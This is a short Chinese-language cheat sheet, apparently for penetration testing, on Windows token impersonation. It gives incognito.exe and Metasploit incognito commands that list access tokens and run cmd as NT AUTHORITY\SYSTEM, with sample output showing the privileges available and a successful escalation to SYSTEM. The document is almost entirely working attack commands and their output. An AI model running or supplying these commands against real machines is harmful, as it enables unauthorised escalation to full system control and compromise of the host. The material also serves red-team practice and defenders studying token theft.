利用前提:拿到的用户是过了UAC的管理员
#列出用户令牌
incognito.exe list_tokens -u
#使用窃取的令牌执行命令
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd
#msf加载incognito,进行令牌攻击
load incognito #加载incognito
list_tokens -u #列举令牌
impersonate_token "NT AUTHORITY\SYSTEM" #令牌攻击
rev2self 或 drop_token #返回之前token
#获取令牌
C:\Users\Administrator\Desktop>incognito.exe list_tokens -u
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found
Delegation Tokens Available
============================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
YU\Administrator
Impersonation Tokens Available
============================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Window Manager\DWM-1
Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeRelabelPrivilege
SeLoadDriverPrivilege
#执行命令
C:\Users\Administrator\Desktop>incognito.exe execute -c "NT AUTHORITY\SYSTEM" whoami
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[+] Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
nt authority\system